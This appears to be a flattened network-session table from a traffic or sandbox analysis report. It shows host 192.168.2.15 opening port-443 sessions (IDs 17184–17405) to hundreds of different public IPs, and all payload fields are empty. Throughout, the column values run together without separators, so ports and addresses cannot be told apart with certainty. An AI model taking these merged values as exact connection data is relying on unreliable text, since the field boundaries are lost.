                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17184192.168.2.154391648.3.216.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17185192.168.2.155479866.57.76.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17186192.168.2.1534852110.106.154.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17187192.168.2.1551484152.255.146.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17188192.168.2.153795636.140.127.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17189192.168.2.15360188.68.84.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17190192.168.2.1560096132.182.241.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17191192.168.2.1559326209.134.234.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17192192.168.2.1559684105.89.162.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17193192.168.2.1547050184.49.13.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17194192.168.2.1553014154.177.112.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17195192.168.2.154793460.19.5.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17196192.168.2.154244283.238.19.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17197192.168.2.1544814191.65.202.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17198192.168.2.1544060193.43.245.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17199192.168.2.153915065.113.43.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17200192.168.2.1549796124.144.212.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17201192.168.2.1535498194.56.91.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17202192.168.2.15410802.28.205.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17203192.168.2.155579637.33.177.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17204192.168.2.1548644174.14.66.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17205192.168.2.1536044217.154.162.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17206192.168.2.153294285.119.0.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17207192.168.2.15405762.182.239.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17208192.168.2.1560820120.156.65.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17209192.168.2.155882491.65.240.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17210192.168.2.15475061.13.112.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17211192.168.2.155506058.89.109.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17212192.168.2.1537764210.103.23.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17213192.168.2.153920660.70.197.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17214192.168.2.154077272.245.210.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17215192.168.2.154975489.68.253.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17216192.168.2.154125239.238.235.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17217192.168.2.1558122170.250.172.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17218192.168.2.1546072102.45.211.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17219192.168.2.1536518190.238.97.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17220192.168.2.1543812147.96.151.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17221192.168.2.153953817.52.216.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17222192.168.2.154024866.88.159.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17223192.168.2.1536820204.202.108.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17224192.168.2.154888475.57.32.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17225192.168.2.155070471.26.71.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17226192.168.2.1559548123.212.117.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17227192.168.2.1548060143.249.47.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17228192.168.2.1545964207.68.23.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17229192.168.2.153493017.52.178.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17230192.168.2.1554216116.200.167.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17231192.168.2.1557210222.53.4.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17232192.168.2.1560188168.241.66.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17233192.168.2.1557580128.255.161.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17234192.168.2.153618046.40.128.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17235192.168.2.1558338162.221.25.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17236192.168.2.155669045.76.237.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17237192.168.2.1536386139.60.164.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17238192.168.2.1546866117.214.100.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17239192.168.2.15414504.65.170.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17240192.168.2.15462245.158.21.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17241192.168.2.153853437.109.223.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17242192.168.2.1555842121.216.10.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17243192.168.2.1556692185.75.167.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17244192.168.2.1554232189.154.105.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17245192.168.2.153605276.219.194.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17246192.168.2.1553924167.81.79.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17247192.168.2.1533576164.25.222.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17248192.168.2.1538592186.81.173.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17249192.168.2.1532870132.164.72.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17250192.168.2.15439962.42.164.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17251192.168.2.1546924108.225.60.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17252192.168.2.154165684.168.135.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17253192.168.2.1534150133.31.49.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17254192.168.2.1557396174.1.76.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17255192.168.2.155567087.234.42.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17256192.168.2.1548506131.5.186.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17257192.168.2.154021686.19.97.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17258192.168.2.154262614.22.168.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17259192.168.2.1536294138.153.39.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17260192.168.2.1547192100.228.135.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17261192.168.2.153716486.126.108.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17262192.168.2.153563213.208.13.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17263192.168.2.156006058.111.231.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17264192.168.2.1558978141.22.173.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17265192.168.2.155293459.244.209.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17266192.168.2.1544180222.23.214.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17267192.168.2.1556218199.200.132.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17268192.168.2.154641265.218.38.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17269192.168.2.1546704161.109.252.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17270192.168.2.153367860.221.41.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17271192.168.2.1544880109.170.174.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17272192.168.2.1534048168.107.16.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17273192.168.2.154505258.148.170.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17274192.168.2.1553670206.33.243.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17275192.168.2.154855857.181.126.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17276192.168.2.1541634108.35.135.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17277192.168.2.153459459.183.152.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17278192.168.2.155360877.13.174.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17279192.168.2.154967265.168.130.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17280192.168.2.1560100110.138.198.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17281192.168.2.1536952130.156.169.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17282192.168.2.1534116197.29.184.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17283192.168.2.155327258.70.208.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17284192.168.2.1548516143.94.118.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17285192.168.2.1546298125.137.12.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17286192.168.2.153562413.223.243.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17287192.168.2.155216253.94.75.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17288192.168.2.1546956222.78.47.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17289192.168.2.153726094.27.73.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17290192.168.2.1535920199.165.199.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17291192.168.2.1560658113.92.0.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17292192.168.2.1538584176.36.150.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17293192.168.2.1541786223.110.39.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17294192.168.2.153612295.223.66.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17295192.168.2.1559044211.68.25.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17296192.168.2.1555092208.171.124.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17297192.168.2.1549890201.105.176.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17298192.168.2.155644266.45.48.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17299192.168.2.154890850.215.177.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17300192.168.2.154307074.89.162.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17301192.168.2.1552498156.81.113.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17302192.168.2.154143466.141.234.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17303192.168.2.155966661.130.45.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17304192.168.2.1538714115.152.224.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17305192.168.2.1540340202.57.186.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17306192.168.2.1538974160.47.222.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17307192.168.2.155153641.128.234.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17308192.168.2.155375846.196.64.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17309192.168.2.153356694.123.218.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17310192.168.2.155202640.187.128.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17311192.168.2.1536988155.118.174.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17312192.168.2.1552188157.249.250.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17313192.168.2.1537042184.144.52.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17314192.168.2.1535424196.225.209.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17315192.168.2.1558552216.200.199.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17316192.168.2.153756266.157.6.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17317192.168.2.1560902128.86.240.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17318192.168.2.1554036218.65.247.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17319192.168.2.154975093.176.138.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17320192.168.2.1538988115.207.170.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17321192.168.2.1548264181.3.100.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17322192.168.2.155152054.75.3.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17323192.168.2.1547220101.193.185.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17324192.168.2.154929023.166.129.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17325192.168.2.1550862166.111.227.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17326192.168.2.1549822170.160.208.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17327192.168.2.1540880145.105.78.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17328192.168.2.1541258178.40.7.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17329192.168.2.155827640.149.151.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17330192.168.2.155383040.217.169.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17331192.168.2.1543220183.32.113.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17332192.168.2.1548148128.26.29.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17333192.168.2.154731285.106.100.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17334192.168.2.1539650103.184.77.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17335192.168.2.1558224144.69.20.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17336192.168.2.1540534128.255.22.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17337192.168.2.1538522163.151.145.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17338192.168.2.1542424209.217.69.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17339192.168.2.155214639.4.190.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17340192.168.2.153303880.34.98.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17341192.168.2.1548786181.150.115.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17342192.168.2.1547446163.131.204.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17343192.168.2.154276065.163.199.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17344192.168.2.155046697.101.58.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17345192.168.2.154061687.20.77.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17346192.168.2.155802883.6.114.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17347192.168.2.155425419.187.17.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17348192.168.2.153756060.166.247.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17349192.168.2.1537090110.128.232.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17350192.168.2.1546674132.36.219.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17351192.168.2.154698641.233.176.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17352192.168.2.1534074196.213.192.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17353192.168.2.153846470.27.36.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17354192.168.2.1547012122.39.157.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17355192.168.2.15458748.171.200.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17356192.168.2.1543760112.198.17.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17357192.168.2.1550330137.222.142.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17358192.168.2.155173097.53.41.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17359192.168.2.1559578162.61.67.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17360192.168.2.1547236205.183.136.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17361192.168.2.1533974105.43.68.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17362192.168.2.1549006103.174.78.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17363192.168.2.1554450178.242.11.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17364192.168.2.1560312101.148.8.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17365192.168.2.1544972181.212.91.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17366192.168.2.1543582191.162.10.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17367192.168.2.1560204179.94.247.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17368192.168.2.153811895.204.55.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17369192.168.2.1554106159.155.41.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17370192.168.2.1533860222.165.112.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17371192.168.2.155067489.2.249.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17372192.168.2.1556078123.239.31.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17373192.168.2.1558210197.126.96.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17374192.168.2.155753292.148.1.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17375192.168.2.154638891.233.202.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17376192.168.2.1535352137.143.153.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17377192.168.2.1552416175.255.161.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17378192.168.2.1538062160.162.169.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17379192.168.2.155209690.178.193.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17380192.168.2.155440490.87.86.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17381192.168.2.1534492154.198.251.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17382192.168.2.1541856136.200.59.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17383192.168.2.1533502134.253.174.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17384192.168.2.155160653.85.111.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17385192.168.2.154070290.180.57.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17386192.168.2.1549360111.208.85.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17387192.168.2.153397837.218.199.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17388192.168.2.154809050.10.167.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17389192.168.2.1539706218.67.113.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17390192.168.2.1548006222.242.124.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17391192.168.2.1536572125.8.104.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17392192.168.2.1537574126.30.53.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17393192.168.2.155374843.66.210.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17394192.168.2.1535676152.244.173.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17395192.168.2.155981060.133.83.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17396192.168.2.153863418.222.172.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17397192.168.2.1555226144.175.22.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17398192.168.2.1560608172.237.59.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17399192.168.2.1549904216.139.61.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17400192.168.2.154058898.252.45.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17401192.168.2.153419619.23.224.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17402192.168.2.1542866195.77.76.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17403192.168.2.154903050.187.30.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17404192.168.2.15491945.161.97.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17405192.168.2.1544856139.66.1.80443
